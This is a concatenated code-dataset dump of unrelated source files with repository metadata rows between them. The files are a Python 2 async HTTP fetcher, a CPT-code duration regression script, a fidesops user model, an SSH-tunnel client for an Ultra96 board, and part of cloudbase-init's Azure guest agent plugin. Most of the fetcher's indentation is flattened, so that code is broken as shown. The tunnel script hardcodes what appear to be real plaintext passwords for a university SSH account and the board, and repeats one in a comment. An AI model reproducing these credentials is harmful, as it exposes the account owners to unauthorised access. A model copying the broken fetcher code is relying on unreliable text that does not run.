    # A connection is removed from the pool INACTIVE_TIMEOUT seconds
    # after the last data was received on it.
INACTIVE_TIMEOUT = 3 * 60
# Timeout for connecting to host. Host connections are blocking - do not use too big value.
CONNECTION_TIMEOUT = 4
# Number of retries if failure.
DEFAULT_ATTEMPTS = 3
    # Send an error response if too many requests are queued.
MAX_QUEUE_SIZE = 1000
    # If we have been processing a request for too long - consider it dead.
REQUEST_PROCESSING_TIMEOUT = 2 * 60
# Time to cache dns responses, seconds
DNS_CACHE_TIME = 60 * 60
# Time to cache dns errors
DNS_FAIL_CACHE_TIME = 2 * 60
# Maximum number of connections per host
MAX_CONNECTIONS_PER_HOST = 300
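# ------------------------------------------------------------------------------------
# A hedged tuning sketch: SETTINGS holds plain class attributes, so a deployment
# can override them before constructing AsyncFetcher (the values below are
# illustrative only, not recommendations).
def example_tune_settings():
    SETTINGS.MAX_QUEUE_SIZE = 5000
    SETTINGS.DEFAULT_ATTEMPTS = 1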
# ------------------------------------------------------------------------------------
def LOG_DEBUG_DEV(msg):
#print '[DEBUG]', msg
pass
# ------------------------------------------------------------------------------------
def LOG_WARNING(msg):
print '[WARNING]', msg
# ------------------------------------------------------------------------------------
class _StrSocket(object):
def __init__(self, response_str):
self._file = StringIO(response_str)
def makefile(self, *args, **kwargs):
return self._file
# ------------------------------------------------------------------------------------
def _buildRequest(host, method, query, data):
request = '{method} http://{host}{query} HTTP/1.1\r\n'\
'Host: {host}\r\n'\
'Connection: Keep-Alive\r\n'.format(method=method, query=query, host=host)
if data is not None:
request += 'Content-Type: application/x-www-form-urlencoded\r\n'\
'Content-Length: {len}\r\n'.format(len=str(len(data)))
request += '\r\n'
if data is not None:
request += data
return request
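# ------------------------------------------------------------------------------------
# Illustrative only (host and query are assumed values): the raw keep-alive
# request text produced by _buildRequest for a simple GET.
def _example_request_text():
    # -> 'GET http://example.com:80/ping HTTP/1.1\r\nHost: example.com:80\r\n'
    #    'Connection: Keep-Alive\r\n\r\n'
    return _buildRequest('example.com:80', 'GET', '/ping', None)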
# ------------------------------------------------------------------------------------
class _Connection(object):
# ------------------------------------------------------------------------------------
def __init__(self, host, ep, dnsResolver):
self.host = host
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = host.split(':')
if len(host) == 0:
raise Exception("wrong host")
elif len(host) == 1:
host.append(80)
host[1] = int(host[1])
host[0] = dnsResolver.resolve(host[0])
host = tuple(host[:2])
self.sock.settimeout(SETTINGS.CONNECTION_TIMEOUT)
self.sock.setblocking(0)
ep.register(self.sock.fileno(), select.EPOLLOUT)
try:
self.sock.connect(host)
except socket.error as e:
if e.errno != 115:
self.sock.close()
raise e
self.clear()
self.lastResponse = time.time()
self.state = 'connecting'
# ------------------------------------------------------------------------------------
def clear(self):
self.__buffer = ''
self.request = None
self.__req = None
# ------------------------------------------------------------------------------------
def fileno(self):
return self.sock.fileno()
# ------------------------------------------------------------------------------------
def sendRequest(self, httpRequest):
LOG_DEBUG_DEV('send request')
self.request = httpRequest
req = _buildRequest(self.host, httpRequest.method, httpRequest.query, httpRequest.data)
if self.state == 'connecting':
LOG_DEBUG_DEV('connecting')
self.__req = req
else:
res = self.sock.send(req)
LOG_DEBUG_DEV('sending: %s' % str(res))
# ------------------------------------------------------------------------------------
def onConnected(self):
LOG_DEBUG_DEV('on connected')
self.state = 'connected'
self.lastResponse = time.time()
if self.__req is not None:
res = self.sock.send(self.__req)
LOG_DEBUG_DEV('sending: %s' % str(res))
self.__req = None
# ------------------------------------------------------------------------------------
def processResponse(self):
LOG_DEBUG_DEV('process response')
resp = self.sock.recv(1024)
if len(resp) > 0:
self.lastResponse = time.time()
self.__buffer += resp
source = _StrSocket(self.__buffer)
response = httplib.HTTPResponse(source)
response.begin()
status = response.status
data = response.read()
LOG_DEBUG_DEV('response parsed')
return (status, data, self.request)
# ------------------------------------------------------------------------------------
def isActive(self):
return time.time() < self.lastResponse + SETTINGS.INACTIVE_TIMEOUT
# ------------------------------------------------------------------------------------
class _ConnectionManager(object):
# ------------------------------------------------------------------------------------
def __init__(self, dnsResolver):
self.__connections = {} # host -> list of connections
self.__dnsResolver = dnsResolver
# ------------------------------------------------------------------------------------
def getConnection(self, host, ep):
hostConnections = self.__connections.get(host, None)
if hostConnections is None:
return _Connection(host, ep, self.__dnsResolver)
conn = hostConnections[0]
del hostConnections[0]
if len(hostConnections) == 0:
del self.__connections[host]
return conn
def getWaitingConnectionsNum(self, host):
return len(self.__connections.get(host, []))
# ------------------------------------------------------------------------------------
def returnConnection(self, connection):
connection.clear()
self.__connections.setdefault(connection.host, []).append(connection)
# ------------------------------------------------------------------------------------
def removeOldConnections(self, ep):
newConnections = {}
for host, connections in self.__connections.iteritems():
goodConnections = []
for conn in connections:
if conn.isActive():
goodConnections.append(conn)
else:
try:
ep.unregister(conn.sock.fileno())
except IOError:
pass
if len(goodConnections) > 0:
newConnections[host] = goodConnections
self.__connections = newConnections
# ------------------------------------------------------------------------------------
def removeConnection(self, fno):
newConnections = {}
for host, connections in self.__connections.iteritems():
goodConnections = []
for conn in connections:
if conn.fileno() != fno:
goodConnections.append(conn)
if len(goodConnections) > 0:
newConnections[host] = goodConnections
self.__connections = newConnections
# ------------------------------------------------------------------------------------
def printStatus(self):
print 'connection-manager:', len(self.__connections)
for h in self.__connections:
print h, len(self.__connections[h])
# ------------------------------------------------------------------------------------
def getStatusDict(self):
status = {}
for h, c in self.__connections.iteritems():
status['waiting_host_connections.%s' % h] = len(c)
return status
# ------------------------------------------------------------------------------------
class _DnsCachingResolver(object):
# ------------------------------------------------------------------------------------
def __init__(self):
self.__cache = {} # hostname => (time, [ip1, ip2, ... ])
# ------------------------------------------------------------------------------------
def resolve(self, hostname):
currTime = time.time()
cachedTime, ips = self.__cache.get(hostname, (0, []))
timePassed = currTime - cachedTime
if (timePassed > SETTINGS.DNS_CACHE_TIME) or (not ips and timePassed > SETTINGS.DNS_FAIL_CACHE_TIME):
prevIps = ips
ips = self.__doResolve(hostname)
if not ips:
ips = prevIps
self.__cache[hostname] = (currTime, ips)
if len(self.__cache) > 10000:
self.__cache = {}
return None if not ips else random.choice(ips)
# ------------------------------------------------------------------------------------
def __doResolve(self, hostname):
LOG_DEBUG_DEV('resolving %s' % hostname)
try:
ips = socket.gethostbyname_ex(hostname)[2]
except socket.gaierror:
LOG_WARNING('failed to resolve host %s' % hostname)
ips = []
return ips
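# ------------------------------------------------------------------------------------
# Illustrative only: the resolver caches the per-hostname IP list and returns a
# random entry, so the second call below is served from the cache for up to
# DNS_CACHE_TIME seconds.
def _example_resolve(hostname='localhost'):
    resolver = _DnsCachingResolver()
    first = resolver.resolve(hostname)
    second = resolver.resolve(hostname)
    return first, second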
# ------------------------------------------------------------------------------------
class HttpRequest(object):
def __init__(self, host, method, query, data, callback):
self.host = host
self.method = method
self.query = query
self.data = data
self.callback = callback
self.attempts = SETTINGS.DEFAULT_ATTEMPTS
# ------------------------------------------------------------------------------------
def signature(self):
return str(self.host) + '\n' + str(self.method) + '\n' + str(self.query) + '\n' + str(self.data)
# ------------------------------------------------------------------------------------
class AsyncFetcher(object):
# ------------------------------------------------------------------------------------
def __init__(self):
self.__epoll = select.epoll()
self.__requestQueue = Queue.Queue()
self.__responseQueue = Queue.Queue()
self.__connections = {} # fileno => http connection
self.__dnsResolver = _DnsCachingResolver()
self.__connectionManager = _ConnectionManager(self.__dnsResolver)
self.pipeToThread = os.pipe()
self.pipeToMain = os.pipe()
self.__currentRequests = {}
self.__connectionsNumPerHost = defaultdict(int)
thread.start_new_thread(self.__workerThread, ())
thread.start_new_thread(self.__mainThread, ())
# ------------------------------------------------------------------------------------
def fetch(self, request):
LOG_DEBUG_DEV('fetch request')
if self.__requestQueue.qsize() > SETTINGS.MAX_QUEUE_SIZE or\
self.__responseQueue.qsize() > SETTINGS.MAX_QUEUE_SIZE:
try:
LOG_DEBUG_DEV('max queue size')
request.callback(ERROR.MAX_QUEUE_SIZE, '', request)
except Exception as e:
print '[ERROR]', e
return
currentRequests = self.__currentRequests.get(request.signature(), None)
if currentRequests is not None:
LOG_DEBUG_DEV('request already in flight')
currentRequests.append(request)
return
LOG_DEBUG_DEV('added request to queue')
self.__requestQueue.put(request)
self.__currentRequests[request.signature()] = [int(time.time()), request]
os.write(self.pipeToThread[1], '\n')
# ------------------------------------------------------------------------------------
def onTimer(self, timerID, userData):
self.__checkTimeouts()
# ------------------------------------------------------------------------------------
def processCallbacks(self, fd = None):
LOG_DEBUG_DEV('process callbacks')
pipeIn = self.pipeToMain[0]
os.read(pipeIn, 1)
while not self.__responseQueue.empty():
status, data, request = self.__responseQueue.get()
LOG_DEBUG_DEV(status)
currentRequests = self.__currentRequests.pop(request.signature(), None)
if currentRequests is None:
currentRequests = [request]
else:
currentRequests = currentRequests[1:]
for req in currentRequests:
try:
req.callback(status, data, req)
except Exception as e:
print '[ERROR] callback error:', e
    # Remove requests that live too long.
# ------------------------------------------------------------------------------------
def __checkTimeouts(self):
for k in self.__currentRequests.keys():
ts = self.__currentRequests.get(k, (0, 0))[0]
if ts is not None and ts + SETTINGS.REQUEST_PROCESSING_TIMEOUT < time.time():
del self.__currentRequests[k]
# ------------------------------------------------------------------------------------
def __mainThread(self):
pipeIn = self.pipeToMain[0]
while True:
os.read(pipeIn, 1)
while not self.__responseQueue.empty():
status, data, request = self.__responseQueue.get()
request.callback(status, data, request)
# ------------------------------------------------------------------------------------
def __workerThread(self):
pipeIn = self.pipeToThread[0]
self.__epoll.register(pipeIn, select.EPOLLIN)
last10SecondsTime = time.time()
while True:
try:
events = self.__epoll.poll(0.2)
for fileno, event in events:
if fileno == pipeIn:
os.read(pipeIn, 1)
while not self.__requestQueue.empty():
request = self.__requestQueue.get()
self.__processRequest(request)
elif fileno in self.__connections:
self.__processIncoming(fileno)
else:
LOG_DEBUG_DEV('event in unknown descr: %d' % fileno)
self.__epoll.unregister(fileno)
self.__connectionManager.removeConnection(fileno)
ctime = time.time()
for fd in self.__connections.keys():
conn = self.__connections[fd]
if (conn.state == 'connecting' and conn.lastResponse + SETTINGS.CONNECTION_TIMEOUT < ctime) or \
(conn.state == 'connected' and conn.lastResponse + SETTINGS.INACTIVE_TIMEOUT < ctime):
                        # Retry or fail the request that was in flight
                        # on this timed-out connection.
                        if conn.request.attempts <= 1:
                            self.__publishResponse(ERROR.CONNECTION_FAILED, '', conn.request)
                        else:
                            conn.request.attempts -= 1
                            self.__processRequest(conn.request)
self.__epoll.unregister(fd)
del self.__connections[fd]
self.__connectionsNumPerHost[conn.host] -= 1
if time.time() > last10SecondsTime + 10.0:
last10SecondsTime = time.time()
self.__connectionManager.removeOldConnections(self.__epoll)
self.__connectionsNumPerHost = defaultdict(int)
                    for conn in self.__connections.values():
self.__connectionsNumPerHost[conn.host] += 1
except Exception as e:
print '[ERROR]', e
# ------------------------------------------------------------------------------------
def __publishResponse(self, status, data, request):
LOG_DEBUG_DEV('publishing response %d' % status)
self.__responseQueue.put((status, data, request))
os.write(self.pipeToMain[1], '\n')
# ------------------------------------------------------------------------------------
def __processRequest(self, request):
LOG_DEBUG_DEV('process request')
try:
if self.__connectionsNumPerHost[request.host] >= SETTINGS.MAX_CONNECTIONS_PER_HOST and \
self.__connectionManager.getWaitingConnectionsNum(request.host) == 0:
self.__publishResponse(ERROR.MAX_HOST_CONNECTIONS, '', request)
return
conn = self.__connectionManager.getConnection(request.host, self.__epoll)
except (socket.gaierror, socket.timeout, socket.error):
if request.attempts <= 1:
self.__publishResponse(ERROR.CONNECTION_FAILED, '', request)
else:
request.attempts -= 1
self.__processRequest(request)
return
fno = conn.fileno()
self.__connections[fno] = conn
self.__connectionsNumPerHost[conn.host] += 1
conn.sendRequest(request)
# ------------------------------------------------------------------------------------
def __processIncoming(self, fileno):
LOG_DEBUG_DEV('process incoming')
conn = self.__connections[fileno]
try:
if conn.state == 'connecting':
self.__epoll.unregister(conn.sock.fileno())
self.__epoll.register(conn.sock.fileno(), select.EPOLLIN)
conn.onConnected()
return
res = conn.processResponse()
except (httplib.IncompleteRead, socket.error):
return
except httplib.BadStatusLine:
self.__epoll.unregister(fileno)
del self.__connections[fileno]
self.__connectionsNumPerHost[conn.host] -= 1
if conn.request.attempts <= 1:
self.__publishResponse(ERROR.CONNECTION_DROPED, '', conn.request)
else:
conn.request.attempts -= 1
self.__processRequest(conn.request)
return
status, data, callback = res
self.__publishResponse(status, data, callback)
self.__connectionManager.returnConnection(conn)
del self.__connections[fileno]
self.__connectionsNumPerHost[conn.host] -= 1
# ------------------------------------------------------------------------------------
def getRequestQueueSize(self):
return self.__requestQueue.qsize()
# ------------------------------------------------------------------------------------
def getResponseQueueSize(self):
return self.__responseQueue.qsize()
# ------------------------------------------------------------------------------------
def getConnectionsNumber(self):
return len(self.__connections)
# ------------------------------------------------------------------------------------
def printStatus(self):
print '\n === AsyncFetcher status ==='
print 'connections:', len(self.__connections)
print 'requests-queue:', self.__requestQueue.qsize()
print 'response-queue:', self.__responseQueue.qsize()
self.__connectionManager.printStatus()
print ''
def getStatusDict(self):
status = {
'requests_queue': self.__requestQueue.qsize(),
'response_queue': self.__responseQueue.qsize(),
'connections': len(self.__connections),
}
for k, v in self.__connectionsNumPerHost.iteritems():
status['host_connections.%s' % k] = v
status.update(self.__connectionManager.getStatusDict())
return status
# Usage sample
# ====================================================================================
# ------------------------------------------------------------------------------------
def sampleCallback(status, data, request):
print 'fetched:', status, len(data)
print data
# ------------------------------------------------------------------------------------
if __name__ == '__main__':
fetcher = AsyncFetcher()
while True:
fetcher.fetch(HttpRequest('google.com:80', 'GET', '/', None, sampleCallback))
time.sleep(4.0) | 34.452242 | 103 | 0.552337 |
4a211ea7a6f364c1669daed65f2eab11c72e8360 | 2,037 | py | Python | unported scripts/learn_duration.py | KirovskiXVI/dicom-sr-qi | 810f367d0845f4f47c3ee914502cf973b4f9b336 | [
"BSD-2-Clause"
] | null | null | null | unported scripts/learn_duration.py | KirovskiXVI/dicom-sr-qi | 810f367d0845f4f47c3ee914502cf973b4f9b336 | [
"BSD-2-Clause"
] | null | null | null | unported scripts/learn_duration.py | KirovskiXVI/dicom-sr-qi | 810f367d0845f4f47c3ee914502cf973b4f9b336 | [
"BSD-2-Clause"
] | null | null | null | import my_utils
import numpy as np
def least_squares(t_procs, v_procs):
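    # Model (sketch): a procedure's duration is approximated as the sum of
    # per-CPT-code time contributions, i.e. b ~= A.x with A[i][j] = 1 when
    # procedure i includes CPT code j, solved in the least-squares sense.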
    lookup = {}  # maps a CPT code onto an int
for proc in t_procs:
for cpt in proc.get_cpts():
lookup[cpt] = None
for i,cpt in enumerate(sorted(lookup.keys())):
lookup[cpt] = i
#build the arrays for np.linalg.lstsq
b = np.zeros(len(t_procs))
a = np.zeros([len(t_procs),len(lookup)])
for i,proc in enumerate(t_procs):
for cpt in proc.get_cpts():
a[i][lookup[cpt]]=1
b[i] = my_utils.total_seconds(proc.get_duration())
soln, residues, rank, s = np.linalg.lstsq(a,b)
for i,cpt in enumerate(sorted(lookup.keys())):
print str(cpt) +',' + str(soln[i])
error_list = []
skipped_count = 0
for proc in v_procs:
vect = np.zeros(len(lookup))
try:
for cpt in proc.get_cpts():
vect[lookup[cpt]] = 1
except KeyError:
skipped_count = skipped_count +1
            continue  # CPT code appears in validation but not in the training set; can't make a prediction
prediction = np.dot(vect, soln)
reality = my_utils.total_seconds(proc.get_duration())
error_list.append(abs(prediction-reality))
error_list.sort()
print error_list
print np.median(error_list)
print "Skipped " + str(skipped_count)
def split_procs(procs, valid_frac = .2):
"""Split the procedures into a
training and validation set based
on start time
"""
procs.sort(key = lambda x: x.get_start_time())
    split_ind = int((1 - valid_frac) * len(procs))
training = procs[:split_ind]
validation = procs[split_ind:]
return (training, validation)
def main():
procs = my_utils.get_procs('bjh')
has_all_data = lambda x: x.has_syngo() and x.has_events()
procs = [p for p in procs if has_all_data(p)]
t_procs, v_procs = split_procs(procs)
least_squares(t_procs, v_procs)
if __name__ == '__main__':
main()
| 32.854839 | 99 | 0.609229 |
4a211f144c203d49f0c663b66e5f187ab913af9a | 2,518 | py | Python | src/fidesops/models/fidesops_user.py | ethyca/fidesops | 5cfbfda32123593fd7bf2b64586be827d763ea74 | [
"Apache-2.0"
] | 41 | 2021-11-01T23:53:43.000Z | 2022-03-22T23:07:56.000Z | src/fidesops/models/fidesops_user.py | ethyca/fidesops | 5cfbfda32123593fd7bf2b64586be827d763ea74 | [
"Apache-2.0"
] | 235 | 2021-11-01T20:31:55.000Z | 2022-03-31T15:40:58.000Z | src/fidesops/models/fidesops_user.py | ethyca/fidesops | 5cfbfda32123593fd7bf2b64586be827d763ea74 | [
"Apache-2.0"
] | 12 | 2021-11-02T00:44:51.000Z | 2022-03-14T16:23:10.000Z | from datetime import datetime
from typing import Dict, Any, Tuple
from sqlalchemy import Column, String, DateTime
from sqlalchemy.orm import Session, relationship
from fidesops.core.config import config
from fidesops.db.base_class import Base
from fidesops.util.cryptographic_util import generate_salt, hash_with_salt
class FidesopsUser(Base):
"""The DB ORM model for FidesopsUser"""
username = Column(String, unique=True, index=True)
hashed_password = Column(String, nullable=False)
salt = Column(String, nullable=False)
last_login_at = Column(DateTime(timezone=True), nullable=True)
password_reset_at = Column(DateTime(timezone=True), nullable=True)
client = relationship(
"ClientDetail", backref="user", cascade="all, delete", uselist=False
)
@classmethod
def hash_password(cls, password: str) -> Tuple[str, str]:
"""Utility function to hash a user's password with a generated salt"""
salt = generate_salt()
hashed_password = hash_with_salt(
password.encode(config.security.ENCODING),
salt.encode(config.security.ENCODING),
)
return hashed_password, salt
@classmethod
def create(cls, db: Session, data: Dict[str, Any]) -> "FidesopsUser":
"""Create a FidesopsUser by hashing the password with a generated salt
and storing the hashed password and the salt"""
hashed_password, salt = FidesopsUser.hash_password(data["password"])
user = super().create(
db,
data={
"salt": salt,
"hashed_password": hashed_password,
"username": data["username"],
},
)
return user
def credentials_valid(self, password: str) -> bool:
"""Verifies that the provided password is correct"""
provided_password_hash = hash_with_salt(
password.encode(config.security.ENCODING),
self.salt.encode(config.security.ENCODING),
)
return provided_password_hash == self.hashed_password
def update_password(self, db: Session, new_password: str) -> None:
"""Updates the user's password to the specified value.
No validations are performed on the old/existing password within this function."""
hashed_password, salt = FidesopsUser.hash_password(new_password)
self.hashed_password = hashed_password
self.salt = salt
self.password_reset_at = datetime.utcnow()
self.save(db)
| 35.971429 | 90 | 0.668785 |
4a211fa3cc11b7897136647d2975b494f191408c | 192 | py | Python | tones.py | sdickreuter/ToneGen | 69c554c7207563a69479202349061e1f8ef4f328 | [
"MIT"
] | 1 | 2020-09-18T20:27:50.000Z | 2020-09-18T20:27:50.000Z | tones.py | sdickreuter/ToneGen | 69c554c7207563a69479202349061e1f8ef4f328 | [
"MIT"
] | null | null | null | tones.py | sdickreuter/ToneGen | 69c554c7207563a69479202349061e1f8ef4f328 | [
"MIT"
] | null | null | null | # Frequencies of the musical notes in Hz
names = ['B','C','Db','D','Eb','E','F','Gb','G','Ab','A','Bb']
freqs = [7.72, 8.18, 8.66, 9.18, 9.72, 10.30, 10.91, 11.56, 12.25, 12.98, 13.75, 14.57]
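# A minimal sketch (not in the original file): in equal temperament each
# semitone multiplies frequency by 2 ** (1 / 12.0), so an octave doubles it.
def freq_at(name, octave):
    # hypothetical helper; assumes the table above is octave 0 of this scheme
    return freqs[names.index(name)] * (2 ** octave)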
| 48 | 87 | 0.53125 |
4a21201a5958e38b10160616296ac0292989a812 | 2,678 | py | Python | external_comms/laptop_1/client_L1.py | ShawnTanzc/CG4002-Capstone-B15 | dd4edfb2a9cc2b876f63c3599f63554dcfc1fb89 | [
"BSD-3-Clause"
] | null | null | null | external_comms/laptop_1/client_L1.py | ShawnTanzc/CG4002-Capstone-B15 | dd4edfb2a9cc2b876f63c3599f63554dcfc1fb89 | [
"BSD-3-Clause"
] | null | null | null | external_comms/laptop_1/client_L1.py | ShawnTanzc/CG4002-Capstone-B15 | dd4edfb2a9cc2b876f63c3599f63554dcfc1fb89 | [
"BSD-3-Clause"
] | null | null | null | import paramiko
from paramiko import SSHClient, AutoAddPolicy
def sshCommand(hostname, port, username, password, command):
sshClient = paramiko.SSHClient()
sshClient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
sshClient.load_system_host_keys()
sshClient.connect(hostname, port, username, password)
stdin, stdout, stderr = sshClient.exec_command(command)
print(stdout.read())
# if __name__ == '__main__':
# sshCommand('sunfire.comp.nus.edu.sg', 22, 'shawntan', 'stzc@S9817869D', 'ls')
# import socket
#
# clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# clientsocket.connect(('localhost', 15432))
# clientsocket.send('hello')
# import paramiko
# import sshtunnel
#
# from sshtunnel import SSHTunnelForwarder
#
# server = SSHTunnelForwarder(
# 'sunfire.comp.nus.edu.sg',
# ssh_username="USERNAME",
# ssh_password="PASSWORD",
# remote_bind_address=('127.0.0.1', 8080)
# )
#
# server.start()
#
# print(server.local_bind_port) # show assigned local port
# # work with `SECRET SERVICE` through `server.local_bind_port`.
# server.stop()
import paramiko
import sshtunnel
from sshtunnel import open_tunnel
from time import sleep
import socket
def open_ssh_tunneling_to_ultra96():
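    # Chained tunnel: this machine -> sunfire.comp.nus.edu.sg:22 -> 137.132.86.238:22
    # (Ultra96) -> 127.0.0.1:15435 on the board, exposed locally on port 15435.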
ssh_tunnel = open_tunnel(
('sunfire.comp.nus.edu.sg', 22),
ssh_username="shawntan",
ssh_password="stzc@S9817869D",
remote_bind_address=('137.132.86.238', 22),
block_on_close=False)
ssh_tunnel.start()
# print(ssh_tunnel.local_bind_port)
print("Connection to ssh tunnel: OK...")
ultra96_tunnel = open_tunnel(
#('127.0.0.1',ssh_tunnel.local_bind_port),
ssh_address_or_host=('localhost', ssh_tunnel.local_bind_port),
remote_bind_address=('127.0.0.1', 15435),
ssh_username='xilinx',
ssh_password='apricot816',
local_bind_address=('127.0.0.1', 15435),
block_on_close=False
)
ultra96_tunnel.start()
print(ultra96_tunnel.local_bind_port)
print("Connection to ultra 96: OK...")
# sshCommand('localhost', ultra96_tunnel.local_bind_port, 'xilinx', 'apricot816', 'ls')
connect_socket()
def connect_socket():
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as clientsocket:
clientsocket.connect(('localhost', 15435))
print('Connection to server: OK...')
clientsocket.send(b'Hello Nice to Meet you')
data = clientsocket.recv(1024)
print(f'Received {data}')
except ConnectionRefusedError:
print("Unable to connect")
if __name__ == '__main__':
open_ssh_tunneling_to_ultra96()
# connect_socket() | 31.139535 | 91 | 0.690441 |
4a21208af1972fc396bef449f79bd0a04983a809 | 11,345 | py | Python | cloudbaseinit/plugins/windows/azureguestagent.py | andia10240/cloudbase-init | 3c290194c139990f2a0e5747aa2f6c9554d26659 | [
"Apache-2.0"
] | 160 | 2015-01-09T14:45:59.000Z | 2022-03-15T09:15:12.000Z | cloudbaseinit/plugins/windows/azureguestagent.py | andia10240/cloudbase-init | 3c290194c139990f2a0e5747aa2f6c9554d26659 | [
"Apache-2.0"
] | 95 | 2015-01-25T15:22:05.000Z | 2022-03-16T10:40:27.000Z | cloudbaseinit/plugins/windows/azureguestagent.py | andia10240/cloudbase-init | 3c290194c139990f2a0e5747aa2f6c9554d26659 | [
"Apache-2.0"
] | 86 | 2015-01-19T17:19:35.000Z | 2022-03-24T09:21:55.000Z | # Copyright (c) 2017 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import os
import shutil
import zipfile
from oslo_log import log as oslo_logging
from six.moves import winreg
from cloudbaseinit import conf as cloudbaseinit_conf
from cloudbaseinit import exception
from cloudbaseinit.osutils import factory as osutils_factory
from cloudbaseinit.plugins.common import base
CONF = cloudbaseinit_conf.CONF
LOG = oslo_logging.getLogger(__name__)
SERVICE_NAME_RDAGENT = "RdAgent"
SERVICE_NAME_WAGUESTAGENT = "WindowsAzureGuestAgent"
SERVICE_NAME_WA_TELEMETRY = "WindowsAzureTelemetryService"
RDAGENT_FILENAME = "WaAppAgent.exe"
GUEST_AGENT_FILENAME = "Microsoft.Azure.Agent.Windows.exe"
NANO_VMAGENT_FILENAME = "WaSvc.exe"
GUEST_AGENT_EVENTNAME = "Global\\AzureAgentStopRequest"
LOGMAN_TRACE_NOT_RUNNING = 0x80300104
LOGMAN_TRACE_NOT_FOUND = 0x80300002
GUEST_AGENT_ROOT_PATH = "WindowsAzure"
PACKAGES_ROOT_PATH = "Packages"
GUEST_AGENT_SOURCE_PATH = '$$\\OEM\\GuestAgent'
VM_AGENT_PACKAGE = "VmAgent_Nano.zip"
class AzureGuestAgentPlugin(base.BasePlugin):
@staticmethod
def _check_delete_service(osutils, service_name):
if osutils.check_service_exists(service_name):
svc_status = osutils.get_service_status(service_name)
if svc_status != osutils.SERVICE_STATUS_STOPPED:
osutils.stop_service(service_name, wait=True)
osutils.delete_service(service_name)
@staticmethod
def _remove_agent_services(osutils):
LOG.info("Stopping and removing any existing Azure guest agent "
"services")
for service_name in [
SERVICE_NAME_RDAGENT, SERVICE_NAME_WAGUESTAGENT,
SERVICE_NAME_WA_TELEMETRY]:
AzureGuestAgentPlugin._check_delete_service(
osutils, service_name)
@staticmethod
def _remove_azure_dirs():
for path in [GUEST_AGENT_ROOT_PATH, PACKAGES_ROOT_PATH]:
full_path = os.path.join(os.getenv("SystemDrive"), "\\", path)
if os.path.exists(full_path):
LOG.info("Removing folder: %s", full_path)
try:
shutil.rmtree(full_path)
except Exception as ex:
LOG.error("Failed to remove path: %s", full_path)
LOG.exception(ex)
@staticmethod
def _set_registry_vm_type(vm_type="IAAS"):
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows Azure") as key:
winreg.SetValueEx(key, "VMType", 0, winreg.REG_SZ, vm_type)
@staticmethod
def _set_registry_ga_params(install_version, install_timestamp):
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\GuestAgent") as key:
install_version_str = "%s.%s.%s.%s" % install_version
winreg.SetValueEx(
key, "Incarnation", 0, winreg.REG_SZ, install_version_str)
install_timestamp_str = install_timestamp.strftime(
'%m/%d/%Y %I:%M:%S %p')
winreg.SetValueEx(
key, "VmProvisionedAt", 0, winreg.REG_SZ,
install_timestamp_str)
@staticmethod
def _configure_vm_agent(osutils, vm_agent_target_path):
vm_agent_zip_path = os.path.join(os.getenv("SystemDrive"), '\\',
"Windows", "NanoGuestAgent",
VM_AGENT_PACKAGE)
vm_agent_log_path = os.path.join(os.getenv("SystemDrive"), '\\',
GUEST_AGENT_ROOT_PATH, "Logs")
if not os.path.exists(vm_agent_log_path):
os.makedirs(vm_agent_log_path)
with zipfile.ZipFile(vm_agent_zip_path) as zf:
zf.extractall(vm_agent_target_path)
vm_agent_service_path = os.path.join(
vm_agent_target_path, NANO_VMAGENT_FILENAME)
vm_agent_service_path = ("{service_path} -name {agent_name} -ownLog "
"{log_path}\\W_svc.log -svcLog {log_path}"
"\\S_svc.log -event {event_name} -- "
"{vm_agent_target_path}\\"
"{guest_agent}".format(
service_path=vm_agent_service_path,
agent_name=SERVICE_NAME_WAGUESTAGENT,
log_path=vm_agent_log_path,
event_name=GUEST_AGENT_EVENTNAME,
vm_agent_target_path=vm_agent_target_path,
guest_agent=GUEST_AGENT_FILENAME))
osutils.create_service(
SERVICE_NAME_WAGUESTAGENT, SERVICE_NAME_WAGUESTAGENT,
vm_agent_service_path, osutils.SERVICE_START_MODE_MANUAL)
@staticmethod
def _configure_rd_agent(osutils, ga_target_path):
rd_agent_service_path = os.path.join(
ga_target_path, RDAGENT_FILENAME)
# TODO(alexpilotti): Add a retry here as the service could have been
# marked for deletion
osutils.create_service(
SERVICE_NAME_RDAGENT, SERVICE_NAME_RDAGENT,
rd_agent_service_path, osutils.SERVICE_START_MODE_MANUAL)
path = os.path.join(ga_target_path, "TransparentInstaller.dll")
ga_version = osutils.get_file_version(path)
ga_install_time = datetime.datetime.now()
AzureGuestAgentPlugin._set_registry_vm_type()
AzureGuestAgentPlugin._set_registry_ga_params(
ga_version, ga_install_time)
@staticmethod
def _stop_event_trace(osutils, name, ets=False):
return AzureGuestAgentPlugin._run_logman(osutils, "stop", name, ets)
@staticmethod
def _delete_event_trace(osutils, name):
return AzureGuestAgentPlugin._run_logman(osutils, "delete", name)
@staticmethod
def _run_logman(osutils, action, name, ets=False):
args = ["logman.exe"]
if ets:
args += ["-ets"]
args += [action, name]
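        # e.g. action="stop", name="GAEvents" -> ["logman.exe", "stop", "GAEvents"]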
(out, err, ret_val) = osutils.execute_system32_process(args)
if ret_val not in [
0, LOGMAN_TRACE_NOT_RUNNING, LOGMAN_TRACE_NOT_FOUND]:
LOG.error(
'logman failed.\nExit code: %(ret_val)s\n'
'Output: %(out)s\nError: %(err)s',
{'ret_val': hex(ret_val), 'out': out, 'err': err})
@staticmethod
def _stop_ga_event_traces(osutils):
LOG.info("Stopping Azure guest agent event traces")
AzureGuestAgentPlugin._stop_event_trace(osutils, "GAEvents")
AzureGuestAgentPlugin._stop_event_trace(osutils, "RTEvents")
AzureGuestAgentPlugin._stop_event_trace(
osutils, "WindowsAzure-GuestAgent-Metrics", ets=True)
AzureGuestAgentPlugin._stop_event_trace(
osutils, "WindowsAzure-GuestAgent-Diagnostic", ets=True)
@staticmethod
def _delete_ga_event_traces(osutils):
LOG.info("Deleting Azure guest agent event traces")
